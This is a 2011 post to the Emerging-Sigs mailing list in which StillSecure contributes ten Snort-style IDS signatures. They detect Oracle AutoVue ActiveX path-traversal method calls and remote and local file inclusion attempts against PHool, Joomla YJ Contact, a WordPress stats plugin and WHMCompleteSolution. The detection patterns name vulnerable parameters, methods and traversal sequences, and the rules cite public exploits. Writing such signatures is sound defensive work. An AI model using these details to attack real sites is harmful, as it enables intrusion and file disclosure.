[Emerging-Sigs] StillSecure: 10 New Signatures - October 28th, 2011

signatures signatures at stillsecure.com
Fri Oct 28 06:25:57 EDT 2011


Hi Matt,

Please find the 10 signatures below,

1. WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".SaveViewStateToFile"; nocase; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,exploit-db.com/exploits/18016; sid:2410112; rev:1;)

2. WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (SaveViewStateToFile) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".SaveViewStateToFile"; nocase; content:"|2E 2E 2F|"; reference:url,exploit-db.com/exploits/18016; classtype:attempted-user; sid:2410113; rev:1;)

3. WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".Export3DBom"; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106064/9sg_autovueii.tgz; sid:2710111; rev:1;)

4. WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (Export3DBom) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".Export3DBom"; content:"|2E 2E 2F|"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106064/9sg_autovueii.tgz; sid:2710113; rev:1;)

5. WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom)
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom)"; flow:to_client,established; content:"<OBJECT "; nocase; content:"classid"; nocase; distance:0; content:"CLSID"; nocase; distance:0; content:"B6FCC215-D303-11D1-BC6C-0000C078797F"; nocase; distance:0; content:".ExportEdaBom"; content:"|2E 2E 2F|"; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B6FCC215-D303-11D1-BC6C-0000C078797F/si"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106065/9sg_autovueiii.tgz; sid:2710112; rev:1;)

6. WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom) Format String Function Call
alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"WEB-ATTACKS Oracle AutoVue Activex Insecure method (ExportEdaBom) Format String Function Call"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"AUTOVUEX.AutoVueXCtrl.1"; nocase; distance:0; content:".ExportEdaBom"; content:"|2E 2E 2F|"; classtype:attempted-user; reference:url,packetstormsecurity.org/files/106065/9sg_autovueiii.tgz; sid:2710114; rev:1;)

7. WEB-PHP PHool mainnav Parameter Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP PHool mainnav Parameter Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/includes/layout/plain.footer.php?"; nocase; uricontent:"mainnav="; nocase; pcre:"/mainnav=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,packetstormsecurity.org/files/106073/sportsphool-rfi.txt; sid:2410111; rev:1;)

8. WEB-PHP Joomla YJ Contact Local File Inclusion Vulnerability
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Joomla YJ Contact Local File Inclusion Vulnerability"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/index.php?"; nocase; uricontent:"option=com_yjcontactus"; uricontent:"view="; nocase; nocase; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,/packetstormsecurity.org/files/106222/joomlayjcontact-lfi.txt; sid:0902112; rev:1;)

9. WEB-PHP Wordpress Easy Stats plugin homep Parameter Remote File inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP Wordpress Easy Stats plugin homep Parameter Remote File inclusion Attempt"; flow:established,to_server; content:"GET "; depth:4; uricontent:"/wp-content/plugins/wpeasystats/export.php?"; nocase; uricontent:"homep="; nocase; pcre:"/homep=\s*(ftps?|https?|php)\:\//Ui"; classtype:web-application-attack; reference:url,secunia.com/advisories/46069; reference:url,spareclockcycles.org/2011/09/18/exploitring-the-wordpress-extension-repos; sid:2510111; rev:1;)

10. WEB-PHP WHMCompleteSolution templatefile Parameter Local File Inclusion Attempt
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"WEB-PHP WHMCompleteSolution templatefile Parameter Local File Inclusion Attempt"; flow:established,to_server; uricontent:"/cart.php?"; nocase; uricontent:"a="; nocase; uricontent:"templatefile="; nocase; content:"|2e 2e 2f|"; nocase; depth:200; classtype:web-application-attack; reference:url,dl.packetstormsecurity.net/1110-exploits/whmcompletesolution-disclose.txt; sid:281020112; rev:1;)

Looking forward your comments if any.

Thanks & Regards,
StillSecure

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.emergingthreats.net/pipermail/emerging-sigs/attachments/20111028/d7a904cf/attachment-0001.html


More information about the Emerging-sigs mailing list